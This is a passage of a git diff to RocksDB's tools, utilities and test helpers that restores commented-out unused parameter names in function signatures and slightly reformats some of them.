unsigned int numPackedBytes() const { return sizeof(FbsonValue) + sizeof(T); } // catch all unknow specialization of the template class - bool setVal(T /*value*/) { return false; } + bool setVal(T value) { return false; } private: T num_; diff --git a/tools/db_bench_tool.cc b/tools/db_bench_tool.cc index dfa00de5adc..0cc424eeab2 100644 --- a/tools/db_bench_tool.cc +++ b/tools/db_bench_tool.cc @@ -235,7 +235,7 @@ DEFINE_bool(use_uint64_comparator, false, "use Uint64 user comparator"); DEFINE_int64(batch_size, 1, "Batch size"); -static bool ValidateKeySize(const char* /*flagname*/, int32_t /*value*/) { +static bool ValidateKeySize(const char* flagname, int32_t value) { return true; } @@ -2041,9 +2041,8 @@ class Benchmark { explicit ExpiredTimeFilter( const std::shared_ptr& timestamp_emulator) : timestamp_emulator_(timestamp_emulator) {} - bool Filter(int /*level*/, const Slice& key, - const Slice& /*existing_value*/, std::string* /*new_value*/, - bool* /*value_changed*/) const override { + bool Filter(int level, const Slice& key, const Slice& existing_value, + std::string* new_value, bool* value_changed) const override { return KeyExpired(timestamp_emulator_.get(), key); } const char* Name() const override { return "ExpiredTimeFilter"; } @@ -3352,9 +3351,12 @@ void VerifyDBFromDB(std::string& truth_db_name) { class KeyGenerator { public: - KeyGenerator(Random64* rand, WriteMode mode, uint64_t num, - uint64_t /*num_per_set*/ = 64 * 1024) - : rand_(rand), mode_(mode), num_(num), next_(0) { + KeyGenerator(Random64* rand, WriteMode mode, + uint64_t num, uint64_t num_per_set = 64 * 1024) + : rand_(rand), + mode_(mode), + num_(num), + next_(0) { if (mode_ == UNIQUE_RANDOM) { // NOTE: if memory consumption of this approach becomes a concern, // we can either break it into pieces and only random shuffle a section diff --git a/tools/ldb_cmd.cc b/tools/ldb_cmd.cc index 1c02ef64026..2cd4d94d112 100644 --- a/tools/ldb_cmd.cc +++ b/tools/ldb_cmd.cc @@ -111,7 +111,7 @@ LDBCommand* LDBCommand::InitFromCmdLineArgs( LDBCommand* LDBCommand::InitFromCmdLineArgs( const std::vector& args, const Options& options, const LDBOptions& ldb_options, - const std::vector* /*column_families*/, + const std::vector* column_families, const std::function& selector) { // --x=y command line arguments are added as x->y map entries in // parsed_params.option_map. @@ -456,7 +456,7 @@ std::vector LDBCommand::BuildCmdLineOptions( * updated. */ bool LDBCommand::ParseIntOption( - const std::map& /*options*/, + const std::map& options, const std::string& option, int& value, LDBCommandExecuteResult& exec_state) { std::map::const_iterator itr = @@ -486,7 +486,7 @@ bool LDBCommand::ParseIntOption( * Returns false otherwise. 
*/ bool LDBCommand::ParseStringOption( - const std::map& /*options*/, + const std::map& options, const std::string& option, std::string* value) { auto itr = option_map_.find(option); if (itr != option_map_.end()) { @@ -764,7 +764,7 @@ bool LDBCommand::StringToBool(std::string val) { } CompactorCommand::CompactorCommand( - const std::vector& /*params*/, + const std::vector& params, const std::map& options, const std::vector& flags) : LDBCommand(options, flags, false, @@ -834,7 +834,7 @@ const std::string DBLoaderCommand::ARG_BULK_LOAD = "bulk_load"; const std::string DBLoaderCommand::ARG_COMPACT = "compact"; DBLoaderCommand::DBLoaderCommand( - const std::vector& /*params*/, + const std::vector& params, const std::map& options, const std::vector& flags) : LDBCommand( @@ -950,7 +950,7 @@ void ManifestDumpCommand::Help(std::string& ret) { } ManifestDumpCommand::ManifestDumpCommand( - const std::vector& /*params*/, + const std::vector& params, const std::map& options, const std::vector& flags) : LDBCommand( @@ -1145,7 +1145,7 @@ const std::string InternalDumpCommand::ARG_STATS = "stats"; const std::string InternalDumpCommand::ARG_INPUT_KEY_HEX = "input_key_hex"; InternalDumpCommand::InternalDumpCommand( - const std::vector& /*params*/, + const std::vector& params, const std::map& options, const std::vector& flags) : LDBCommand( @@ -1284,7 +1284,7 @@ const std::string DBDumperCommand::ARG_STATS = "stats"; const std::string DBDumperCommand::ARG_TTL_BUCKET = "bucket"; DBDumperCommand::DBDumperCommand( - const std::vector& /*params*/, + const std::vector& params, const std::map& options, const std::vector& flags) : LDBCommand(options, flags, true, @@ -1560,7 +1560,7 @@ const std::string ReduceDBLevelsCommand::ARG_PRINT_OLD_LEVELS = "print_old_levels"; ReduceDBLevelsCommand::ReduceDBLevelsCommand( - const std::vector& /*params*/, + const std::vector& params, const std::map& options, const std::vector& flags) : LDBCommand(options, flags, false, @@ -1689,7 +1689,7 @@ const std::string ChangeCompactionStyleCommand::ARG_NEW_COMPACTION_STYLE = "new_compaction_style"; ChangeCompactionStyleCommand::ChangeCompactionStyleCommand( - const std::vector& /*params*/, + const std::vector& params, const std::map& options, const std::vector& flags) : LDBCommand(options, flags, false, @@ -1826,7 +1826,7 @@ void ChangeCompactionStyleCommand::DoCommand() { namespace { struct StdErrReporter : public log::Reader::Reporter { - virtual void Corruption(size_t /*bytes*/, const Status& s) override { + virtual void Corruption(size_t bytes, const Status& s) override { std::cerr << "Corruption detected in log file " << s.ToString() << "\n"; } }; @@ -1990,7 +1990,7 @@ const std::string WALDumperCommand::ARG_PRINT_VALUE = "print_value"; const std::string WALDumperCommand::ARG_PRINT_HEADER = "header"; WALDumperCommand::WALDumperCommand( - const std::vector& /*params*/, + const std::vector& params, const std::map& options, const std::vector& flags) : LDBCommand(options, flags, true, @@ -2074,7 +2074,7 @@ void GetCommand::DoCommand() { // ---------------------------------------------------------------------------- ApproxSizeCommand::ApproxSizeCommand( - const std::vector& /*params*/, + const std::vector& params, const std::map& options, const std::vector& flags) : LDBCommand(options, flags, true, @@ -2190,7 +2190,7 @@ Options BatchPutCommand::PrepareOptionsForOpenDB() { // ---------------------------------------------------------------------------- -ScanCommand::ScanCommand(const std::vector& /*params*/, 
+ScanCommand::ScanCommand(const std::vector& params, const std::map& options, const std::vector& flags) : LDBCommand( @@ -2474,7 +2474,7 @@ const char* DBQuerierCommand::PUT_CMD = "put"; const char* DBQuerierCommand::DELETE_CMD = "delete"; DBQuerierCommand::DBQuerierCommand( - const std::vector& /*params*/, + const std::vector& params, const std::map& options, const std::vector& flags) : LDBCommand( @@ -2553,7 +2553,7 @@ void DBQuerierCommand::DoCommand() { // ---------------------------------------------------------------------------- CheckConsistencyCommand::CheckConsistencyCommand( - const std::vector& /*params*/, + const std::vector& params, const std::map& options, const std::vector& flags) : LDBCommand(options, flags, false, BuildCmdLineOptions({})) {} @@ -2585,7 +2585,7 @@ void CheckConsistencyCommand::DoCommand() { const std::string CheckPointCommand::ARG_CHECKPOINT_DIR = "checkpoint_dir"; CheckPointCommand::CheckPointCommand( - const std::vector& /*params*/, + const std::vector& params, const std::map& options, const std::vector& flags) : LDBCommand(options, flags, false /* is_read_only */, @@ -2623,7 +2623,7 @@ void CheckPointCommand::DoCommand() { // ---------------------------------------------------------------------------- -RepairCommand::RepairCommand(const std::vector& /*params*/, +RepairCommand::RepairCommand(const std::vector& params, const std::map& options, const std::vector& flags) : LDBCommand(options, flags, false, BuildCmdLineOptions({})) {} @@ -2653,7 +2653,7 @@ const std::string BackupableCommand::ARG_BACKUP_DIR = "backup_dir"; const std::string BackupableCommand::ARG_STDERR_LOG_LEVEL = "stderr_log_level"; BackupableCommand::BackupableCommand( - const std::vector& /*params*/, + const std::vector& params, const std::map& options, const std::vector& flags) : LDBCommand(options, flags, false /* is_read_only */, @@ -2831,7 +2831,7 @@ void DumpSstFile(std::string filename, bool output_hex, bool show_properties) { } // namespace DBFileDumperCommand::DBFileDumperCommand( - const std::vector& /*params*/, + const std::vector& params, const std::map& options, const std::vector& flags) : LDBCommand(options, flags, true, BuildCmdLineOptions({})) {} diff --git a/tools/ldb_tool.cc b/tools/ldb_tool.cc index b09076ecc61..e8229ef7b91 100644 --- a/tools/ldb_tool.cc +++ b/tools/ldb_tool.cc @@ -13,7 +13,7 @@ namespace rocksdb { LDBOptions::LDBOptions() {} void LDBCommandRunner::PrintHelp(const LDBOptions& ldb_options, - const char* /*exec_name*/) { + const char* exec_name) { std::string ret; ret.append(ldb_options.print_help_header); diff --git a/tools/sst_dump_tool.cc b/tools/sst_dump_tool.cc index 6110d5d5c40..2a1729c7651 100644 --- a/tools/sst_dump_tool.cc +++ b/tools/sst_dump_tool.cc @@ -110,9 +110,9 @@ Status SstFileReader::GetTableReader(const std::string& file_path) { } Status SstFileReader::NewTableReader( - const ImmutableCFOptions& /*ioptions*/, const EnvOptions& /*soptions*/, - const InternalKeyComparator& /*internal_comparator*/, uint64_t file_size, - unique_ptr* /*table_reader*/) { + const ImmutableCFOptions& ioptions, const EnvOptions& soptions, + const InternalKeyComparator& internal_comparator, uint64_t file_size, + unique_ptr* table_reader) { // We need to turn off pre-fetching of index and filter nodes for // BlockBasedTable shared_ptr block_table_factory = diff --git a/util/compression.h b/util/compression.h index b75672f1438..468b961fbfd 100644 --- a/util/compression.h +++ b/util/compression.h @@ -151,9 +151,8 @@ inline std::string 
CompressionTypeToString(CompressionType compression_type) { // 2 -- Zlib, BZip2 and LZ4 encode decompressed size as Varint32 just before the // start of compressed block. Snappy format is the same as version 1. -inline bool Snappy_Compress(const CompressionOptions& /*opts*/, - const char* input, size_t length, - ::std::string* output) { +inline bool Snappy_Compress(const CompressionOptions& opts, const char* input, + size_t length, ::std::string* output) { #ifdef SNAPPY output->resize(snappy::MaxCompressedLength(length)); size_t outlen; @@ -382,9 +381,10 @@ inline char* Zlib_Uncompress(const char* input_data, size_t input_length, // block header // compress_format_version == 2 -- decompressed size is included in the block // header in varint32 format -inline bool BZip2_Compress(const CompressionOptions& /*opts*/, - uint32_t compress_format_version, const char* input, - size_t length, ::std::string* output) { +inline bool BZip2_Compress(const CompressionOptions& opts, + uint32_t compress_format_version, + const char* input, size_t length, + ::std::string* output) { #ifdef BZIP2 if (length > std::numeric_limits::max()) { // Can't compress more than 4GB @@ -520,7 +520,7 @@ inline char* BZip2_Uncompress(const char* input_data, size_t input_length, // header in varint32 format // @param compression_dict Data for presetting the compression library's // dictionary. -inline bool LZ4_Compress(const CompressionOptions& /*opts*/, +inline bool LZ4_Compress(const CompressionOptions& opts, uint32_t compress_format_version, const char* input, size_t length, ::std::string* output, const Slice compression_dict = Slice()) { @@ -705,17 +705,15 @@ inline bool LZ4HC_Compress(const CompressionOptions& opts, return false; } -inline bool XPRESS_Compress(const char* /*input*/, size_t /*length*/, - std::string* /*output*/) { +inline bool XPRESS_Compress(const char* input, size_t length, std::string* output) { #ifdef XPRESS return port::xpress::Compress(input, length, output); #endif return false; } -inline char* XPRESS_Uncompress(const char* /*input_data*/, - size_t /*input_length*/, - int* /*decompress_size*/) { +inline char* XPRESS_Uncompress(const char* input_data, size_t input_length, + int* decompress_size) { #ifdef XPRESS return port::xpress::Decompress(input_data, input_length, decompress_size); #endif diff --git a/util/delete_scheduler_test.cc b/util/delete_scheduler_test.cc index 7d531244c6d..208bdd74177 100644 --- a/util/delete_scheduler_test.cc +++ b/util/delete_scheduler_test.cc @@ -239,7 +239,7 @@ TEST_F(DeleteSchedulerTest, DisableRateLimiting) { int bg_delete_file = 0; rocksdb::SyncPoint::GetInstance()->SetCallBack( "DeleteScheduler::DeleteTrashFile:DeleteFile", - [&](void* /*arg*/) { bg_delete_file++; }); + [&](void* arg) { bg_delete_file++; }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); @@ -346,7 +346,7 @@ TEST_F(DeleteSchedulerTest, StartBGEmptyTrashMultipleTimes) { int bg_delete_file = 0; rocksdb::SyncPoint::GetInstance()->SetCallBack( "DeleteScheduler::DeleteTrashFile:DeleteFile", - [&](void* /*arg*/) { bg_delete_file++; }); + [&](void* arg) { bg_delete_file++; }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); rate_bytes_per_sec_ = 1024 * 1024; // 1 MB / sec @@ -381,7 +381,7 @@ TEST_F(DeleteSchedulerTest, DestructorWithNonEmptyQueue) { int bg_delete_file = 0; rocksdb::SyncPoint::GetInstance()->SetCallBack( "DeleteScheduler::DeleteTrashFile:DeleteFile", - [&](void* /*arg*/) { bg_delete_file++; }); + [&](void* arg) { bg_delete_file++; }); 
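// A minimal sketch, for orientation, of the sync-point counting pattern these
// delete_scheduler tests repeat. It assumes only what the hunks here already
// use: SyncPoint from util/sync_point.h (an internal test-only helper) and the
// "DeleteScheduler::DeleteTrashFile:DeleteFile" marker; the two helper
// function names below are made up for illustration.
#include <atomic>
#include "util/sync_point.h"

static std::atomic<int> bg_delete_count{0};

void InstallDeleteCounter() {
  // Bump the counter every time the scheduler's background thread reaches the
  // named marker inside DeleteTrashFile().
  rocksdb::SyncPoint::GetInstance()->SetCallBack(
      "DeleteScheduler::DeleteTrashFile:DeleteFile",
      [](void* /*arg*/) { bg_delete_count.fetch_add(1); });
  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
}

void RemoveDeleteCounter() {
  // Stop firing callbacks and drop the registration before asserting on
  // bg_delete_count in the test body.
  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
  rocksdb::SyncPoint::GetInstance()->ClearAllCallBacks();
}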
rocksdb::SyncPoint::GetInstance()->EnableProcessing(); rate_bytes_per_sec_ = 1; // 1 Byte / sec @@ -410,7 +410,7 @@ TEST_F(DeleteSchedulerTest, MoveToTrashError) { int bg_delete_file = 0; rocksdb::SyncPoint::GetInstance()->SetCallBack( "DeleteScheduler::DeleteTrashFile:DeleteFile", - [&](void* /*arg*/) { bg_delete_file++; }); + [&](void* arg) { bg_delete_file++; }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); rate_bytes_per_sec_ = 1024; // 1 Kb / sec @@ -436,9 +436,10 @@ TEST_F(DeleteSchedulerTest, DISABLED_DynamicRateLimiting1) { int fg_delete_file = 0; rocksdb::SyncPoint::GetInstance()->SetCallBack( "DeleteScheduler::DeleteTrashFile:DeleteFile", - [&](void* /*arg*/) { bg_delete_file++; }); + [&](void* arg) { bg_delete_file++; }); rocksdb::SyncPoint::GetInstance()->SetCallBack( - "DeleteScheduler::DeleteFile", [&](void* /*arg*/) { fg_delete_file++; }); + "DeleteScheduler::DeleteFile", + [&](void* arg) { fg_delete_file++; }); rocksdb::SyncPoint::GetInstance()->SetCallBack( "DeleteScheduler::BackgroundEmptyTrash:Wait", [&](void* arg) { penalties.push_back(*(static_cast(arg))); }); @@ -517,9 +518,9 @@ TEST_F(DeleteSchedulerTest, ImmediateDeleteOn25PercDBSize) { int fg_delete_file = 0; rocksdb::SyncPoint::GetInstance()->SetCallBack( "DeleteScheduler::DeleteTrashFile:DeleteFile", - [&](void* /*arg*/) { bg_delete_file++; }); + [&](void* arg) { bg_delete_file++; }); rocksdb::SyncPoint::GetInstance()->SetCallBack( - "DeleteScheduler::DeleteFile", [&](void* /*arg*/) { fg_delete_file++; }); + "DeleteScheduler::DeleteFile", [&](void* arg) { fg_delete_file++; }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); diff --git a/util/file_reader_writer_test.cc b/util/file_reader_writer_test.cc index aa81992666a..dac5182452b 100644 --- a/util/file_reader_writer_test.cc +++ b/util/file_reader_writer_test.cc @@ -26,7 +26,9 @@ TEST_F(WritableFileWriterTest, RangeSync) { size_ += data.size(); return Status::OK(); } - virtual Status Truncate(uint64_t /*size*/) override { return Status::OK(); } + virtual Status Truncate(uint64_t size) override { + return Status::OK(); + } Status Close() override { EXPECT_GE(size_, last_synced_ + kMb); EXPECT_LT(size_, last_synced_ + 2 * kMb); @@ -37,21 +39,17 @@ TEST_F(WritableFileWriterTest, RangeSync) { Status Flush() override { return Status::OK(); } Status Sync() override { return Status::OK(); } Status Fsync() override { return Status::OK(); } - void SetIOPriority(Env::IOPriority /*pri*/) override {} + void SetIOPriority(Env::IOPriority pri) override {} uint64_t GetFileSize() override { return size_; } - void GetPreallocationStatus(size_t* /*block_size*/, - size_t* /*last_allocated_block*/) override {} - size_t GetUniqueId(char* /*id*/, size_t /*max_size*/) const override { - return 0; - } - Status InvalidateCache(size_t /*offset*/, size_t /*length*/) override { + void GetPreallocationStatus(size_t* block_size, + size_t* last_allocated_block) override {} + size_t GetUniqueId(char* id, size_t max_size) const override { return 0; } + Status InvalidateCache(size_t offset, size_t length) override { return Status::OK(); } protected: - Status Allocate(uint64_t /*offset*/, uint64_t /*len*/) override { - return Status::OK(); - } + Status Allocate(uint64_t offset, uint64_t len) override { return Status::OK(); } Status RangeSync(uint64_t offset, uint64_t nbytes) override { EXPECT_EQ(offset % 4096, 0u); EXPECT_EQ(nbytes % 4096, 0u); @@ -121,14 +119,12 @@ TEST_F(WritableFileWriterTest, IncrementalBuffer) { Status Flush() override { return Status::OK(); } Status Sync() 
override { return Status::OK(); } Status Fsync() override { return Status::OK(); } - void SetIOPriority(Env::IOPriority /*pri*/) override {} + void SetIOPriority(Env::IOPriority pri) override {} uint64_t GetFileSize() override { return size_; } - void GetPreallocationStatus(size_t* /*block_size*/, - size_t* /*last_allocated_block*/) override {} - size_t GetUniqueId(char* /*id*/, size_t /*max_size*/) const override { - return 0; - } - Status InvalidateCache(size_t /*offset*/, size_t /*length*/) override { + void GetPreallocationStatus(size_t* block_size, + size_t* last_allocated_block) override {} + size_t GetUniqueId(char* id, size_t max_size) const override { return 0; } + Status InvalidateCache(size_t offset, size_t length) override { return Status::OK(); } bool use_direct_io() const override { return use_direct_io_; } @@ -178,13 +174,13 @@ TEST_F(WritableFileWriterTest, AppendStatusReturn) { explicit FakeWF() : use_direct_io_(false), io_error_(false) {} virtual bool use_direct_io() const override { return use_direct_io_; } - Status Append(const Slice& /*data*/) override { + Status Append(const Slice& data) override { if (io_error_) { return Status::IOError("Fake IO error"); } return Status::OK(); } - Status PositionedAppend(const Slice& /*data*/, uint64_t) override { + Status PositionedAppend(const Slice& data, uint64_t) override { if (io_error_) { return Status::IOError("Fake IO error"); } diff --git a/util/slice.cc b/util/slice.cc index eed59657f86..8d95a8ae19d 100644 --- a/util/slice.cc +++ b/util/slice.cc @@ -74,7 +74,7 @@ class CappedPrefixTransform : public SliceTransform { return Slice(src.data(), std::min(cap_len_, src.size())); } - virtual bool InDomain(const Slice& /*src*/) const override { return true; } + virtual bool InDomain(const Slice& src) const override { return true; } virtual bool InRange(const Slice& dst) const override { return (dst.size() <= cap_len_); @@ -93,11 +93,11 @@ class NoopTransform : public SliceTransform { virtual Slice Transform(const Slice& src) const override { return src; } - virtual bool InDomain(const Slice& /*src*/) const override { return true; } + virtual bool InDomain(const Slice& src) const override { return true; } - virtual bool InRange(const Slice& /*dst*/) const override { return true; } + virtual bool InRange(const Slice& dst) const override { return true; } - virtual bool SameResultWhenAppended(const Slice& /*prefix*/) const override { + virtual bool SameResultWhenAppended(const Slice& prefix) const override { return false; } }; diff --git a/util/testutil.cc b/util/testutil.cc index 5164101441d..f3010f3f2c0 100644 --- a/util/testutil.cc +++ b/util/testutil.cc @@ -107,12 +107,12 @@ class Uint64ComparatorImpl : public Comparator { } } - virtual void FindShortestSeparator(std::string* /*start*/, - const Slice& /*limit*/) const override { + virtual void FindShortestSeparator(std::string* start, + const Slice& limit) const override { return; } - virtual void FindShortSuccessor(std::string* /*key*/) const override { + virtual void FindShortSuccessor(std::string* key) const override { return; } }; diff --git a/util/testutil.h b/util/testutil.h index 069b883f285..02bfb0ff6d2 100644 --- a/util/testutil.h +++ b/util/testutil.h @@ -121,10 +121,10 @@ class SimpleSuffixReverseComparator : public Comparator { return -(suffix_a.compare(suffix_b)); } } - virtual void FindShortestSeparator(std::string* /*start*/, - const Slice& /*limit*/) const override {} + virtual void FindShortestSeparator(std::string* start, + const Slice& limit) const override {} - 
virtual void FindShortSuccessor(std::string* /*key*/) const override {} + virtual void FindShortSuccessor(std::string* key) const override {} }; // Returns a user key comparator that can be used for comparing two uint64_t @@ -255,8 +255,7 @@ class RandomRWStringSink : public RandomRWFile { return Status::OK(); } - Status Read(uint64_t offset, size_t n, Slice* result, - char* /*scratch*/) const { + Status Read(uint64_t offset, size_t n, Slice* result, char* scratch) const { *result = Slice(nullptr, 0); if (offset < ss_->contents_.size()) { size_t str_res_sz = @@ -377,7 +376,7 @@ class StringSource: public RandomAccessFile { class NullLogger : public Logger { public: using Logger::Logv; - virtual void Logv(const char* /*format*/, va_list /*ap*/) override {} + virtual void Logv(const char* format, va_list ap) override {} virtual size_t GetLogFileSize() const override { return 0; } }; @@ -458,16 +457,15 @@ class FilterNumber : public CompactionFilter { std::string last_merge_operand_key() { return last_merge_operand_key_; } - bool Filter(int /*level*/, const rocksdb::Slice& /*key*/, - const rocksdb::Slice& value, std::string* /*new_value*/, - bool* /*value_changed*/) const override { + bool Filter(int level, const rocksdb::Slice& key, const rocksdb::Slice& value, + std::string* new_value, bool* value_changed) const override { if (value.size() == sizeof(uint64_t)) { return num_ == DecodeFixed64(value.data()); } return true; } - bool FilterMergeOperand(int /*level*/, const rocksdb::Slice& key, + bool FilterMergeOperand(int level, const rocksdb::Slice& key, const rocksdb::Slice& value) const override { last_merge_operand_key_ = key.ToString(); if (value.size() == sizeof(uint64_t)) { @@ -565,7 +563,7 @@ class StringEnv : public EnvWrapper { // The following text is boilerplate that forwards all methods to target() Status NewSequentialFile(const std::string& f, unique_ptr<SequentialFile>* r, - const EnvOptions& /*options*/) override { + const EnvOptions& options) override { auto iter = files_.find(f); if (iter == files_.end()) { return Status::NotFound("The specified file does not exist", f); @@ -573,13 +571,13 @@ class StringEnv : public EnvWrapper { r->reset(new SeqStringSource(iter->second)); return Status::OK(); } - Status NewRandomAccessFile(const std::string& /*f*/, - unique_ptr<RandomAccessFile>* /*r*/, - const EnvOptions& /*options*/) override { + Status NewRandomAccessFile(const std::string& f, + unique_ptr<RandomAccessFile>* r, + const EnvOptions& options) override { return Status::NotSupported(); } Status NewWritableFile(const std::string& f, unique_ptr<WritableFile>* r, - const EnvOptions& /*options*/) override { + const EnvOptions& options) override { auto iter = files_.find(f); if (iter != files_.end()) { return Status::IOError("The specified file already exists", f); @@ -587,8 +585,8 @@ class StringEnv : public EnvWrapper { r->reset(new StringSink(&files_[f])); return Status::OK(); } - virtual Status NewDirectory(const std::string& /*name*/, - unique_ptr<Directory>* /*result*/) override { + virtual Status NewDirectory(const std::string& name, + unique_ptr<Directory>* result) override { return Status::NotSupported(); } Status FileExists(const std::string& f) override { if (files_.find(f) == files_.end()) { return Status::NotFound(); } return Status::OK(); } - Status GetChildren(const std::string& /*dir*/, - std::vector<std::string>* /*r*/) override { + Status GetChildren(const std::string& dir, + std::vector<std::string>* r) override { return Status::NotSupported(); } Status DeleteFile(const std::string& f) override { files_.erase(f); return Status::OK(); } - Status CreateDir(const std::string& /*d*/)
override { + Status CreateDir(const std::string& d) override { return Status::NotSupported(); } - Status CreateDirIfMissing(const std::string& /*d*/) override { + Status CreateDirIfMissing(const std::string& d) override { return Status::NotSupported(); } - Status DeleteDir(const std::string& /*d*/) override { + Status DeleteDir(const std::string& d) override { return Status::NotSupported(); } Status GetFileSize(const std::string& f, uint64_t* s) override { @@ -623,25 +621,24 @@ return Status::OK(); } - Status GetFileModificationTime(const std::string& /*fname*/, - uint64_t* /*file_mtime*/) override { + Status GetFileModificationTime(const std::string& fname, + uint64_t* file_mtime) override { return Status::NotSupported(); } - Status RenameFile(const std::string& /*s*/, - const std::string& /*t*/) override { + Status RenameFile(const std::string& s, const std::string& t) override { return Status::NotSupported(); } - Status LinkFile(const std::string& /*s*/, const std::string& /*t*/) override { + Status LinkFile(const std::string& s, const std::string& t) override { return Status::NotSupported(); } - Status LockFile(const std::string& /*f*/, FileLock** /*l*/) override { + Status LockFile(const std::string& f, FileLock** l) override { return Status::NotSupported(); } - Status UnlockFile(FileLock* /*l*/) override { return Status::NotSupported(); } + Status UnlockFile(FileLock* l) override { return Status::NotSupported(); } protected: std::unordered_map<std::string, std::string> files_; @@ -664,14 +661,14 @@ class ChanglingMergeOperator : public MergeOperator { void SetName(const std::string& name) { name_ = name; } - virtual bool FullMergeV2(const MergeOperationInput& /*merge_in*/, - MergeOperationOutput* /*merge_out*/) const override { + virtual bool FullMergeV2(const MergeOperationInput& merge_in, + MergeOperationOutput* merge_out) const override { return false; } - virtual bool PartialMergeMulti(const Slice& /*key*/, - const std::deque<Slice>& /*operand_list*/, - std::string* /*new_value*/, - Logger* /*logger*/) const override { + virtual bool PartialMergeMulti(const Slice& key, + const std::deque<Slice>& operand_list, + std::string* new_value, + Logger* logger) const override { return false; } virtual const char* Name() const override { return name_.c_str(); } @@ -692,9 +689,8 @@ class ChanglingCompactionFilter : public CompactionFilter { void SetName(const std::string& name) { name_ = name; } - bool Filter(int /*level*/, const Slice& /*key*/, - const Slice& /*existing_value*/, std::string* /*new_value*/, - bool* /*value_changed*/) const override { + bool Filter(int level, const Slice& key, const Slice& existing_value, + std::string* new_value, bool* value_changed) const override { return false; } @@ -717,7 +713,7 @@ class ChanglingCompactionFilterFactory : public CompactionFilterFactory { void SetName(const std::string& name) { name_ = name; } std::unique_ptr<CompactionFilter> CreateCompactionFilter( - const CompactionFilter::Context& /*context*/) override { + const CompactionFilter::Context& context) override { return std::unique_ptr<CompactionFilter>(); } diff --git a/util/thread_local_test.cc b/util/thread_local_test.cc index 789be83d8fd..6fee5eaa574 100644 --- a/util/thread_local_test.cc +++ b/util/thread_local_test.cc @@ -535,7 +535,7 @@ TEST_F(ThreadLocalTest, CompareAndSwap) { namespace { -void* AccessThreadLocal(void* /*arg*/) { +void* AccessThreadLocal(void* arg) { TEST_SYNC_POINT("AccessThreadLocal:Start"); ThreadLocalPtr tlp; tlp.Reset(new std::string("hello RocksDB")); diff --git
a/utilities/backupable/backupable_db.cc b/utilities/backupable/backupable_db.cc index 53f450dac43..8921309e469 100644 --- a/utilities/backupable/backupable_db.cc +++ b/utilities/backupable/backupable_db.cc @@ -754,7 +754,7 @@ Status BackupEngineImpl::CreateNewBackupWithMetadata( uint64_t sequence_number = 0; s = checkpoint.CreateCustomCheckpoint( db->GetDBOptions(), - [&](const std::string& /*src_dirname*/, const std::string& /*fname*/, + [&](const std::string& src_dirname, const std::string& fname, FileType) { // custom checkpoint will switch to calling copy_file_cb after it sees // NotSupported returned from link_file_cb. diff --git a/utilities/backupable/backupable_db_test.cc b/utilities/backupable/backupable_db_test.cc index 8b68c215310..be20a8d9b3d 100644 --- a/utilities/backupable/backupable_db_test.cc +++ b/utilities/backupable/backupable_db_test.cc @@ -57,8 +57,7 @@ class DummyDB : public StackableDB { } using DB::GetOptions; - virtual Options GetOptions( - ColumnFamilyHandle* /*column_family*/) const override { + virtual Options GetOptions(ColumnFamilyHandle* column_family) const override { return options_; } @@ -66,7 +65,7 @@ class DummyDB : public StackableDB { return DBOptions(options_); } - virtual Status EnableFileDeletions(bool /*force*/) override { + virtual Status EnableFileDeletions(bool force) override { EXPECT_TRUE(!deletions_enabled_); deletions_enabled_ = true; return Status::OK(); @@ -79,7 +78,7 @@ class DummyDB : public StackableDB { } virtual Status GetLiveFiles(std::vector<std::string>& vec, uint64_t* mfs, - bool /*flush_memtable*/ = true) override { + bool flush_memtable = true) override { EXPECT_TRUE(!deletions_enabled_); vec = live_files_; *mfs = 100; @@ -136,7 +135,7 @@ class DummyDB : public StackableDB { } // To avoid FlushWAL called on stacked db which is nullptr - virtual Status FlushWAL(bool /*sync*/) override { return Status::OK(); } + virtual Status FlushWAL(bool sync) override { return Status::OK(); } std::vector<std::string> live_files_; // pair @@ -522,7 +521,7 @@ class BackupableDBTest : public testing::Test { void OpenDBAndBackupEngineShareWithChecksum( bool destroy_old_data = false, bool dummy = false, - bool /*share_table_files*/ = true, bool share_with_checksums = false) { + bool share_table_files = true, bool share_with_checksums = false) { backupable_options_->share_files_with_checksum = share_with_checksums; OpenDBAndBackupEngine(destroy_old_data, dummy, share_with_checksums); } diff --git a/utilities/blob_db/blob_db.h b/utilities/blob_db/blob_db.h index 0b101e968f6..f45a42f60a9 100644 --- a/utilities/blob_db/blob_db.h +++ b/utilities/blob_db/blob_db.h @@ -147,9 +147,9 @@ class BlobDB : public StackableDB { const Slice& key) override = 0; using rocksdb::StackableDB::Merge; - virtual Status Merge(const WriteOptions& /*options*/, - ColumnFamilyHandle* /*column_family*/, - const Slice& /*key*/, const Slice& /*value*/) override { + virtual Status Merge(const WriteOptions& options, + ColumnFamilyHandle* column_family, const Slice& key, + const Slice& value) override { return Status::NotSupported("Not supported operation in blob db."); } diff --git a/utilities/blob_db/blob_db_impl.cc b/utilities/blob_db/blob_db_impl.cc index e1648271170..1dd72b6bc3a 100644 --- a/utilities/blob_db/blob_db_impl.cc +++ b/utilities/blob_db/blob_db_impl.cc @@ -143,9 +143,8 @@ void BlobDBFlushBeginListener::OnFlushBegin(DB* db, const FlushJobInfo& info) { } WalFilter::WalProcessingOption BlobReconcileWalFilter::LogRecordFound( - unsigned long long /*log_number*/, const std::string&
/*log_file_name*/, - const WriteBatch& /*batch*/, WriteBatch* /*new_batch*/, - bool* /*batch_changed*/) { + unsigned long long log_number, const std::string& log_file_name, + const WriteBatch& batch, WriteBatch* new_batch, bool* batch_changed) { return WalFilter::WalProcessingOption::kContinueProcessing; } @@ -159,7 +158,7 @@ bool blobf_compare_ttl::operator()(const std::shared_ptr<BlobFile>& lhs, } void EvictAllVersionsCompactionListener::InternalListener::OnCompaction( - int /*level*/, const Slice& key, + int level, const Slice& key, CompactionEventListener::CompactionListenerValueType value_type, const Slice& existing_value, const SequenceNumber& sn, bool is_new) { if (!is_new && @@ -355,7 +354,7 @@ void BlobDBImpl::StartBackgroundTasks() { void BlobDBImpl::Shutdown() { shutdown_.store(true); } -void BlobDBImpl::OnFlushBeginHandler(DB* /*db*/, const FlushJobInfo& /*info*/) { +void BlobDBImpl::OnFlushBeginHandler(DB* db, const FlushJobInfo& info) { if (shutdown_.load()) return; // a callback that happens too soon needs to be ignored @@ -1396,7 +1395,7 @@ std::pair<bool, int64_t> BlobDBImpl::SanityCheck(bool aborted) { } std::pair<bool, int64_t> 